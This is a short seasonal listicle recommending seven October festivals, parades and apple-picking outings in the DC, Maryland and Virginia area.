Seven fall activities to try this October

With the fall season and its cool weather knocking at our doors, festivals and fun activities are starting to emerge. As the trees start to change color and sweaters are brought out, here are seven ideas for this October:

All Things Go Fall Classic
Over the weekend of Oct. 6-7, the All Things Go festival is happening in Union Market in DC. The music festival has a lineup of popular artists like Billie Eilish and Kaye all weekend, accompanied by food vendors and activities like virtual reality and VIP opportunities. Frederick County Park Fall Festival
Also during the weekend off Oct. 6-7, there’s a fair in Maryland featuring the best of fall recreations. Hayrides, arts and crafts, and food are all available throughout the weekend. There’s no admission price, but activities and food have varied costs. Click here for more information.

H Street Festival
On Oct. 13, experience all forms of the arts at this 11-block event with a diverse lineup ofperformances. The festival features artists with dance performances, clothes, art, and opportunities to get involved with the event. Maryland Renaissance Festival
This festival is offered every weekend throughout the month of October in Annapolis, MD. Set in the 16th century, this fair has more than 20 acres of sights, with a jousting tiltyard, theaters, and stages with theatrical performances. Silver Spring Arts and Crafts Fall Fair
On Oct. 21, Silver Spring offers a free arts-and-crafts-centered festival, which is a good choice for families on a relaxing weekend. Offering many of the same activities, this festival is a good low-key way to spend a Sunday. Click here for more information.

Main Street Halloween Parade
This parade on Oct. 27 will be fun for all pet lovers, encouraging pet owners to dress up their animals and bring them to the parade. Located in Crisfield, MD, this is a quaint pastime that will put anyone in a fall mood. Click here for more information.

Apple Picking
There’s no better place for this iconic fall venture than Marker Miller Orchards in Virginia. This orchard offers apple picking, along with other fruits, every weekend, as well as a shop full of cider and fall-based foods.
